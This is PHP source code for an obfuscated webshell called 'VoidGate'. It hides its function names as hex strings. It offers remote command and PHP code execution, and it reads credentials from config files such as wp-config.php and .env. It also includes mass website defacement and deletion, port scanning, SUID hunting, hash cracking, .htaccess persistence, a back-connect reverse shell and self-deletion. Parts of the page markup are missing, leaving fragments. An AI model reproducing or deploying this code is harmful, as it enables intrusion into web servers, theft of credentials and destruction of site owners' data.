<?php echo $f[14]($CONFIG['title']);?>

'VoidGate_ '0x6ick x Nyx6st', 'password' => 'admin', /*default admin.isi null tanpa 'untuk menonaktifkan.*/ ]; // --- HEX-ENCODED --- $f = [ "66756E6374696F6E5F657869737473", "6865783262696E", "66696C655F6765745F636F6E74656E7473", "66696C655F7075745F636F6E74656E7473", "69735F66696C65", "69735F646972", "756E6C696E6B", "726D646972", "7363616E646972", "676574637764", "6368646972", "7265616C70617468", "6469726E616D65", "626173656E616D65", "68746D6C7370656369616C6368617273", "66696C6573697A65", "66696C657065726D73", "737072696E7466", "64617465", "66696C656D74696D65", "63686D6F64", "6D6B646972", "72656E616D65", "7068705F756E616D65", "636F7079", "7368656C6C5F65786563", "73657373696F6E5F7374617274", "696E695F676574", "70617468696E666F", "636C6173735F657869737473", "6576616C", "706870696E666F", "73657373696F6E5F64657374726F79", "66736F636B6F70656E", "70636E746C5F666F726B", "706F7369785F736574736964", "69735F7772697461626C65", "69735F7265616461626C65", "6469736B5F746F74616C5F7370616365", "6469736B5F667265655F7370616365", "6765745F63757272656E745F75736572", "707265675F6D61746368", "737472706F73" ]; foreach ($f as $k => $v) { $f[$k] = hex2bin($v); } unset($k, $v); // --- HANDLER kill --- if (isset($_GET['self_destruct'])) { if (@$f[6](__FILE__)) { echo "VoidGate has been destroyed. Goodbye."; exit; } else { echo "Self-destruct failed. Check file permissions."; exit; } } session_start(); if (isset($_GET['logout'])) { session_destroy(); header("Location: ".$_SERVER['PHP_SELF']); exit; } if (isset($_GET['phpinfo'])) { phpinfo(); exit; } // --- LOGIN HANDLER --- if ($CONFIG['password'] && (!isset($_SESSION['authed']) || !$_SESSION['authed'])) { if (isset($_POST['pass']) && $_POST['pass'] === $CONFIG['password']) { $_SESSION['authed'] = true; } else { die(''); } } // --- helper --- function load_adminer($output_filename) { global $f; $adminer_path = __DIR__ . '/' . $output_filename; if (!$f[36](__DIR__)) { return "Error: Direktori saat ini tidak writable."; } //adminer dwnld $url = 'https://www.adminer.org/latest.php'; $content = false; if ($f[0]('curl_init')) { // function_exists $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); $content = curl_exec($ch); curl_close($ch); } elseif ($f[27]('allow_url_fopen')) { // ini_get $content = @$f[2]($url); // file_get_contents } else { return "Error: cURL dan allow_url_fopen nonaktif. Tidak bisa download."; } if ($content) { if ($f[3]($adminer_path, $content)) { // file_put_contents return true; } else { return "Error: Gagal menyimpan file Adminer."; } } return "Error: Gagal mendownload konten Adminer."; } function executeCommand($cmd){global $f;if($f[0]('shell_exec'))return $f[25]($cmd);if($f[0]('exec')){exec($cmd,$o);return implode("\n",$o);}if($f[0]('passthru')){ob_start();passthru($cmd);return ob_get_clean();}if($f[0]('system')){ob_start();system($cmd);return ob_get_clean();}return"Execution disabled.";} function formatSize($b){if($b>=1073741824)return number_format($b/1073741824,2).' GB';if($b>=1048576)return number_format($b/1048576,2).' MB';if($b>=1024)return number_format($b/1024,2).' KB';return $b.' B';} function getPerms($file){global $f;$p=@$f[16]($file);$i='u';if(($p&0xC000)==0xC000)$i='s';elseif(($p&0xA000)==0xA000)$i='l';elseif(($p&0x8000)==0x8000)$i='-';elseif(($p&0x6000)==0x6000)$i='b';elseif(($p&0x4000)==0x4000)$i='d';elseif(($p&0x2000)==0x2000)$i='c';elseif(($p&0x1000)==0x1000)$i='p';$i.=(($p&0x0100)?'r':'-');$i.=(($p&0x0080)?'w':'-');$i.=(($p&0x0040)?(($p&0x0800)?'s':'x'):(($p&0x0800)?'S':'-'));$i.=(($p&0x0020)?'r':'-');$i.=(($p&0x0010)?'w':'-');$i.=(($p&0x0008)?(($p&0x0400)?'s':'x'):(($p&0x0400)?'S':'-'));$i.=(($p&0x0004)?'r':'-');$i.=(($p&0x0002)?'w':'-');$i.=(($p&0x0001)?(($p&0x0200)?'t':'x'):(($p&0x0200)?'T':'-'));return $i;} function deleteRecursive($dir){global $f;if(!$f[5]($dir))return $f[6]($dir);$items=array_diff($f[8]($dir),['.','..']);foreach($items as $item){$path=$dir.DIRECTORY_SEPARATOR.$item;if($f[5]($path))deleteRecursive($path);else $f[6]($path);}return $f[7]($dir);} //massdeface function massDefaceRecursive($dir, $filename, $content, &$results, $force = false) { global $f; try { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); foreach ($iterator as $item) { if ($f[5]($item->getPathname())) { // is_dir() $path = $item->getPathname(); $target_file = $path . DIRECTORY_SEPARATOR . $filename; // -- PENAMBAHAN FITUR FORCE MODE -- if ($force && !$f[36]($path)) { // is_writable() @$f[20]($path, 0755); // chmod() } if (@$f[3]($target_file, $content)) { // file_put_contents() $results['success'][] = $target_file; } else { $results['failed'][] = $target_file; } } } } catch (Exception $e) { $results['failed'][] = "Error scanning directory $dir: " . $e->getMessage(); } } // FUNGSI BARU UNTUK MASS DELETE function massDeleteRecursive($dir, $filename, &$results) { global $f; try { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::LEAVES_ONLY // Hanya proses file, bukan direktori ); foreach ($iterator as $item) { if ($item->isFile() && $item->getFilename() === $filename) { $target_file = $item->getPathname(); if (@$f[6]($target_file)) { // unlink() $results['success'][] = $target_file; } else { $results['failed'][] = $target_file; } } } } catch (Exception $e) { $results['failed'][] = "Error scanning directory $dir: " . $e->getMessage(); } } function redirect($params=[]){header("Location: ?".http_build_query(array_filter($params)));exit;} function zipFolder($z,$fo,$bP){global $f;$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($fo),RecursiveIteratorIterator::LEAVES_ONLY);foreach($files as $name=>$file){if(!$file->isDir()){$fP=$file->getRealPath();$rP=substr($fP,strlen($bP)+1);$z->addFile($fP,$rP);}}} function findInterestingDirs($start_dir,&$results,$depth=0){global $f;if($depth>4)return;$common_dirs=['/tmp','/var/tmp','/home/'];if($depth==0){$scan_dirs=array_unique(array_merge([$start_dir,$f[12]($start_dir)],$common_dirs));}else{$scan_dirs=[$start_dir];}foreach($scan_dirs as $dir){if(@$f[36]($dir)){$results[]=$dir;}if($depth>0&&$f[5]($dir)){$items=@$f[8]($dir);if(!$items)continue;foreach($items as $item){if($item=='.'||$item=='..')continue;$path=$dir.'/'.$item;if($f[5]($path))findInterestingDirs($path,$results,$depth+1);}}}} function findStringsInFiles($dir, $query, $is_regex, &$results) { global $f; try { $items = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST); } catch (Exception $e) { return; } foreach ($items as $item) { if ($item->isFile() && $f[37]($item->getPathname())) { $content = $f[2]($item->getPathname()); $match = $is_regex ? @$f[41]($query, $content) : $f[42]($content, $query) !== false; if ($match) { $results[] = $item->getPathname(); } } } } function findSuidSgidFiles($dir, &$results) { global $f; try { $items = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST); } catch (Exception $e) { return; } foreach ($items as $item) { if ($item->isFile()) { $perms = $item->getPerms(); if (($perms & 04000) || ($perms & 02000)) { $results[] = $item->getPathname() . ' -> ' . substr($f[17]('%o', $perms), -4); } } } } function identify_hash($hash) { global $f; if ($f[41]('/^\$2[ayb]\$.{56}$/i', $hash)) return 'Bcrypt (WordPress, etc.)'; if ($f[41]('/^[a-f0-9]{32}$/i', $hash)) return 'MD5'; if ($f[41]('/^[a-f0-9]{40}$/i', $hash)) return 'SHA-1'; if ($f[41]('/^[a-f0-9]{64}$/i', $hash)) return 'SHA-256'; if ($f[41]('/^[a-f0-9]{128}$/i', $hash)) return 'SHA-512'; return 'Unknown'; } function crack_hash_api($hash) { global $f; $content = @$f[2]('https://api.crackstation.net/precompute/' . $hash); if($content && $f[41]('/"result": "([^"]+)"/', $content, $matches)) { return $matches[1]; } return false; } // --- config finder --- function smartConfigFinder(&$results) { global $f; $current_dir = $f[11]($f[9]()); // getcwd() $root_config_files = ['wp-config.php', 'configuration.php', 'config.php', '.env']; // Traverse up to find root configs $search_path = $current_dir; while ($search_path && $search_path !== '/' && $f[12]($search_path) !== $search_path) { foreach ($root_config_files as $cfg) { $file_path = $search_path . '/' . $cfg; if ($f[4]($file_path)) { $results[] = $file_path; } } $search_path = $f[12]($search_path); // dirname() } $results = array_unique($results); } $path=$f[11]($f[9]());if(isset($_GET['path'])&&!empty($_GET['path'])){$newPath=$f[11]($_GET['path']);if($newPath&&$f[5]($newPath))$path=$newPath;}@$f[10]($path); $page=isset($_GET['p'])?$_GET['p']:'dashboard';$action=isset($_GET['action'])?$_GET['action']:'';$target=isset($_GET['target'])?$_GET['target']:'';$target_path=$path.'/'.$target; if($_SERVER['REQUEST_METHOD']==='POST'){ $redirect_params=['p'=>$page,'path'=>$path]; if(isset($_FILES['upload_file'])){if($f[24]($_FILES['upload_file']['tmp_name'],$path.'/'.$f[13]($_FILES['upload_file']['name'])))redirect(array_merge($redirect_params,['msg'=>'Uploaded.']));else redirect(array_merge($redirect_params,['msg'=>'Upload Failed!','status'=>'error']));} if(isset($_POST['create'])){$name=$f[13]($_POST['name']);$type=$_POST['type'];if($type=='file'){if($f[3]($path.'/'.$name,'')!==false)redirect(array_merge($redirect_params,['msg'=>"File created."]));else redirect(array_merge($redirect_params,['msg'=>"Failed!",'status'=>'error']));}elseif($type=='dir'){if($f[21]($path.'/'.$name))redirect(array_merge($redirect_params,['msg'=>"Dir created."]));else redirect(array_merge($redirect_params,['msg'=>"Failed!",'status'=>'error']));}} if(isset($_POST['edit_save'])){if($f[3]($_POST['target_file'],$_POST['content'])!==false)redirect(array_merge($redirect_params,['msg'=>'Saved.']));else redirect(array_merge($redirect_params,['msg'=>'Save Failed!','status'=>'error']));} if(isset($_POST['chmod_save'])){if($f[20]($_POST['target_file'],octdec($_POST['perms'])))redirect(array_merge($redirect_params,['msg'=>'Perms changed.']));else redirect(array_merge($redirect_params,['msg'=>'Chmod Failed!','status'=>'error']));} if(isset($_POST['rename_save'])){$new_name=$f[13]($_POST['new_name']);$new_path=$f[12]($_POST['target_file']).'/'.$new_name;if($f[22]($_POST['target_file'],$new_path))redirect(array_merge($redirect_params,['path'=>$f[12]($_POST['target_file']),'msg'=>"Renamed."]));else redirect(array_merge($redirect_params,['msg'=>'Rename Failed!','status'=>'error']));} if(isset($_POST['extract_save'])&&$f[29]('ZipArchive')){$zip=new ZipArchive;if($zip->open($_POST['target_file'])===TRUE){$zip->extractTo($path);$zip->close();redirect(array_merge($redirect_params,['msg'=>'Extracted.']));}else{redirect(array_merge($redirect_params,['msg'=>'Extract Failed!','status'=>'error']));}} if(isset($_POST['zip_selected'])&&$f[29]('ZipArchive')&&!empty($_POST['selected_files'])){$zip_fn='archive_'.date('Y-m-d').'.zip';$zip_fp=$path.'/'.$zip_fn;$zip=new ZipArchive();if($zip->open($zip_fp,ZipArchive::CREATE|ZipArchive::OVERWRITE)===TRUE){foreach($_POST['selected_files'] as $file){$fp=$f[11]($file);if($f[4]($fp))$zip->addFile($fp,$f[13]($fp));elseif($f[5]($fp))zipFolder($zip,$fp,$path);}$zip->close();redirect(array_merge($redirect_params,['msg'=>'Zipped to '.$zip_fn]));}else{redirect(array_merge($redirect_params,['msg'=>'Zip Failed!','status'=>'error']));}}} if($action==='delete'){if(deleteRecursive($target_path))redirect(['p'=>'files','path'=>$path,'msg'=>"Deleted '$target'."]);else redirect(['p'=>'files','path'=>$path,'msg'=>"Delete Failed!",'status'=>'error']);} ?> <?php echo $f[14]($CONFIG['title']);?>

Dashboard Files Terminal Database Mass Tools Network Kill & Crypto Info Logout';?>

Info Server

Uname
User
Server IP
Your IP
Disabled	None';?>

Info Disk

'.formatSize($used_space).' / '.formatSize($total_space).' ('.$used_percent.'%)

'.$used_percent.'%

';}else{echo'

Tidak dapat mengambil info disk.

';}?>

Pengguna Server

Tidak dapat membaca /etc/passwd';}?>

Direktori Writable

Tidak ada direktori writable yang ditemukan.';}?>

Command Execution

Output:

PHP Code Executor

Output:

PHP Information

Adminer Installer

Fitur ini akan mengunduh file Adminer terbaru ke direktori saat ini. Setelah itu, kamu bisa mengaksesnya langsung untuk me-manage database.

Nama file tidak boleh kosong.

'; } else { $result = load_adminer($filename); if ($result === true) { $link = $f[14]($filename); echo '

Adminer berhasil diinstall!
Akses di: '.$link.'

'; } else { echo '

'.$f[14]($result).'

'; } } } ?>

Config Finder

Configs Found:

';foreach($results as $r){echo''.$f[14]($r).''."\n".''.$f[14]($f[2]($r)).''."\n\n";}echo'

';}else{echo'

No main config files found.

';}}?>

String Finder

Files containing "'.$f[14]($_POST['search_query']).'":

'.$f[14](implode("\n",$results)).'

';}else{echo'

No files found containing that string.

';}}?>

SUID/SGID Finder

Potentially exploitable files found:

'.$f[14](implode("\n",$results)).'

';}else{echo'

No SUID/SGID files found in that directory.

';}}?>

Mass Deface v2

[],'failed'=>[]]; $force_mode = isset($_POST['force_mode']); massDefaceRecursive($_POST['deface_dir'],$_POST['deface_filename'],$_POST['deface_content'],$results, $force_mode); echo'

Results:

Success ('.count($results['success']).'):

'.(empty($results['success'])?'None':$f[14](implode("\n",$results['success']))).'

Failed ('.count($results['failed']).'):

'.(empty($results['failed'])?'None':$f[14](implode("\n",$results['failed']))).'

'; } ?>

Mass Delete

[],'failed'=>[]]; massDeleteRecursive($_POST['delete_dir'],$_POST['delete_filename'], $results); echo'

Results:

Deleted ('.count($results['success']).'):

'.(empty($results['success'])?'None':$f[14](implode("\n",$results['success']))).'

Failed ('.count($results['failed']).'):

'.(empty($results['failed'])?'None':$f[14](implode("\n",$results['failed']))).'

'; } ?>

Port Scanner

Scan Results:

';$ports=explode(',',$_POST['scan_ports']);foreach($ports as $p){$p=trim($p);if(!$p)continue;$conn=@$f[33]($_POST['scan_host'],$p,$errno,$errstr,1);if($conn){echo"Port $p: [OPEN]\n";@fclose($conn);}else{echo"Port $p: [CLOSED]\n";}}echo'

';}?>

Back-Connect

Connection Failed.';}}}else{echo'

Error: pcntl_fork or posix_setsid not available.

';}}?>

Hash Identifier & Cracker

Results for: '.$f[14]($hash).'';$type=identify_hash($hash);echo'

Detected Type: '.$f[14]($type).'

';$cracked=crack_hash_api($hash);if($cracked){echo'

CrackStation API Result: '.$f[14]($cracked).'

';}else{echo'

CrackStation API Result: Not Found

';}}?>

HTAccess Persistence

Rule injected! Now try to access '.$f[14]($_POST['fake_name']).'

';}else{echo'

Failed to write to .htaccess

';}}?>

Self Destruct

This will permanently delete this webshell file from the server.

[ Self Destruct Now ]

Edit: '.$f[14]($f[13]($action_target)).'

';}elseif($action=='chmod'){echo'

Chmod: '.$f[14]($f[13]($action_target)).'

';}elseif($action=='rename'){echo'

Rename: '.$f[14]($f[13]($action_target)).'

';}elseif($action=='extract'){echo'

Extract: '.$f[14]($f[13]($action_target)).'

Extract to current directory?

';}else{?>

Path: $part){if(empty($part)&&$i==0){echo'/';continue;}if(empty($part))continue;$built_path.='/'.$part;echo''.$f[14]($part).'/';}?>

Upload

Create

';$files=@$f[8]($path);$dirs_list=[];$files_list=[];if($files){foreach($files as $file){if($file=='.'||$file=='..')continue;if($f[5]($path.'/'.$file))$dirs_list[]=$file;else $files_list[]=$file;}}sort($dirs_list);sort($files_list);$sorted_list=array_merge($dirs_list,$files_list);foreach($sorted_list as $file){$file_path=$path.'/'.$file;$is_dir=$f[5]($file_path);$actions_link='?p=files&target='.urlencode($file).'&path='.urlencode($path);echo'';echo'';echo'';echo'';echo'';echo'';}?>

	Name	Size	Perms	Modified	Actions
.. (Parent)
	';if($is_dir)echo''.$f[14]($file).'';else echo $f[14]($file);echo'	'.($is_dir?'DIR':formatSize(@$f[15]($file_path))).'	'.getPerms($file_path).'	'.$f[18]("Y-m-d H:i:s",@$f[19]($file_path)).'	';if(!$is_dir)echo'Edit';echo'Rename';if(!$is_dir&&$f[29]('ZipArchive')&&@$f[28]($file_path)['extension']=='zip')echo'Extract';echo'Del';echo'

VoidGate by - 2025